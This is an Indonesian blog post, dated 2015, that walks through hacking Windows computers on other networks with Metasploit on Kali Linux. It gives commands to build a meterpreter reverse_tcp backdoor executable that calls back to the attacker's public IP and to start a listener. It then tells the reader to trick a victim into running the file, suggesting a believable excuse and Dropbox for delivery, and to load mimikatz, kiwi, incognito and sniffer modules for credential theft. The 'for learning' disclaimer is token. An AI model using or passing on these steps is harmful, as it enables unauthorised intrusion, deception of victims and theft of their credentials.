Thursday 17 December 2015

HACK WINDOWS MENGGUNAKAN METASPLOIT YANG BERBEDA JARINGAN MENGGUNAKAN KALI LINUX

ASSALLAMUALLAIKUM WR WB


Hallo sobat sekalian
sorry gw baru nongol lagi soalnya akun fb gw yg rextor udah di apus ama mark sucker fucker jadi terpaksa gw nongol dengan versi asli  :v

sebenarnya gw ragu buat posting cara ini karna gw takut kalian bakal melakukan tindak kriminal tapi ya sudahlah anggap aja ini hanya untuk pelajaran + bonus dari gw
soalnya gw bosen posting installing ama scaning mulu wkwkwk

kali ini gw mau memposting tentang metasploit
kalo gak tau apa itu metasploit , cari aja di gugel banyak :v
nah cara kali ini berbeda dengan cara yang sebelumnya yang mengexploitasi / Hacking pc/laptop di satu jaringan aja

di cara ini gw mau berbagi ilmu cara Hack pc/laptop yang berbeda jaringan ( OUT OF INTERNET )
dan tentu saja cara ini sangat ampuh melumpuhkan pc/laptop korban yang berbeda jaringan

NOTE : BUAT PARA COPYERS OTAK DANGKAL BERIKAN NARASUMBER JIKA KALIAN INGIN ME-REPOST BLOG GW...!!!


Oke langsung aja

pertama buka terminal anda

dan masukan perintah

service postgresql start

msfconsole
masukan perintah

use windows/meterpreter/reverse_tcp

set LHOST IP.PUBLIK.ANDA

generate -t exe -f REXTOR404.exe

back

NOTE : Jika anda tidak tau ip publik anda sendiri , anda bisa melihatnya disini 
            
             generate adalah dimana kita akan membuat backdoor dan REXTOR404 adalah nama backdoor gw              sekaligus nama output backdoor yang akan keluar nanti
             ( NAMA BACKDOOR GAK USAH PAKE SPASI )
             hasil output / backdoor akan keluar di file home dengan sesuai nama saat di buat tadi
        

lanjutkan lagi dengan perintah


use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST IP.LOKAL

set LPORT BEBAS

exploit

NOTE : masukan ip lokal anda saat di LHOST ( jika tidak tau ketikan "ifconfig" pada terminal baru tanpa                  tanda kutip )
             masukan PORT bebas
             contoh port yg gw pake adalah 6595
             192.168.1.64 adalah ip lokal gw
sekarang atur di bagian router / gateway agar data remoting bisa keluar masuk

save & quit

NOTE : jika anda diminta pengaturan port server , masukan sesuai port pada settingan metasploit yang anda              masukan tadi

jika sudah selesai
kirim backdoor anda ke korban dan suruh korban untuk mengeksekusinya :v
pake alesan apa kek gitu biar di percaya :v
gw saranin pake dropbox

jika korban sudah mengeksekusi backdoor , maka akan ada terminal meterpreter

Seorang peretas akan mengambil file system target gunanya agar tanpa harus mengirim backdoor lagi ke pc / laptop korban

untuk mengambil hak akses di system
masukan perintah

load -l

load espia extapi incognito kiwi lanattacks mimikatz sniffer

atau 

load espia extapi incognito kiwi lanattacks mimikatz priv sniffer stdapi
masukan perintah 

sysinfo

gunanya untuk melihat informasi operating system yang korban gunakan

kalo masih bingung masukan perintah

help

fungsinya buat ngeliat options yang mau di pake


No comments:

Post a Comment